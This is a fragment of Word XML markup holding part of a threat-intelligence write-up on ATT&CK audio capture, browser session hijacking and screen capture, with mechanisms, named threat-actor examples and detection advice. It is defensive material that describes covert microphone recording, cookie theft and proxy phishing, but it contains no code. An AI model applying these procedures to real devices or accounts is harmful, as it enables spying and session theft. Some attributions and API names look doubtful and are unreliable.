        <w:t xml:space="preserve"> Adversaries activate microphones or abuse voice/video applications to record audio from compromised devices. Captured audio (e.g., conversations, meetings) is exfiltrated for espionage, blackmail, or intelligence gathering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Malware-Enabled Recording via RATs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Remote Access Trojans (RATs) like DarkComet or Pegasus use OS APIs (e.g., Windows Multimedia API, Android MediaRecorder) to silently activate microphones. Audio is compressed (e.g., to MP3) and transmitted to command-and-control (C2) servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>APT37 deployed SOUNDWAVE to record high-value targets' conversations, exfiltrating audio via encrypted channels.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DarkHotel infected hotel Wi-Fi to record executives' discussions using custom RATs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Script-Based Capture with OS Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Attackers execute PowerShell/Python scripts (e.g., PowerSploit's Get-MicrophoneAudio) to record audio without installing malware. Linux tools like arecord or macOS sox are similarly abused.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>APT32 (OceanLotus) used PowerShell scripts to capture 60-second audio clips during business hours, stored in temporary .wav files before exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations &amp; Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Monitor microphone access: Flag processes like powershell.exe calling waveInOpen APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Network analysis: Detect unusual audio file uploads (e.g., .wav, .ogg) to external IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2) Technique: Browser Session Hijacking (T1185)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries inject malicious code into browsers to steal cookies, session tokens, or SSL certificates. This enables unauthorized access to authenticated sessions (e.g., email, cloud apps), bypassing multi-factor authentication (MFA).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidR="005F3585" w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="00694159" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JavaScript Injection for Cookie Theft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Malicious scripts (e.g., embedded in phishing sites) use document.cookie to harvest session cookies. Adversaries decrypt browser storage (e.g., Chrome's Cookies SQLite file) using stolen encryption keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="1551"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kimsuky deployed TRANSLATEXT to steal Google/Naver cookies, enabling Gmail access without credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="1551"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SolarWinds attackers copied Chrome profiles to hijack sessions via duo-sid cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="00694159" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Proxy-Based Session Redirection (e.g., Evilginx2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Attackers set up malicious proxies mimicking legitimate sites (e.g., Microsoft 365). Victims logging in are redirected, allowing adversaries to intercept session tokens in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Star Blizzard used Evilginx2 to steal Microsoft 365 session cookies, bypassing MFA and accessing SharePoint data 11.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations &amp; Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mark cookies as HttpOnly: Block JavaScript access to session cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Audit authentication logs: Flag impossible travel scenarios (e.g., logins from multiple countries within minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3) Technique: Screen Capture (T1113 / T0852 / T1513)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries capture screenshots or screen recordings to steal displayed data (e.g., credentials, diagrams, process schematics). Techniques vary by platform—Windows APIs, Android accessibility services, or ICS HMI screens.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="00694159" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Native API Abuse for Desktop Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Malware calls OS functions like Windows CopyFromScreen or macOS screencapture to capture full screens. Images are saved to disk (e.g., %AppData%\sc.jpg) and exfiltrated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>APT29 used Cobalt Strike's screenshot module to steal engineering diagrams from ICS HMIs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FIN7 captured video recordings of banking sessions to clone transaction workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="00694159" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mobile Screen Capture via Accessibility Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Android malware (e.g., BRATA, Ginp) abuses MediaProjectionManager or accessibility permissions to capture screens during app usage. Overlay attacks trick users into revealing PINs/biometrics.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Drinik recorded screen taps during banking app sessions, stealing biometric authentication data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>LightSpy used iOS AVCaptureScreen to screenshot encrypted messaging apps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
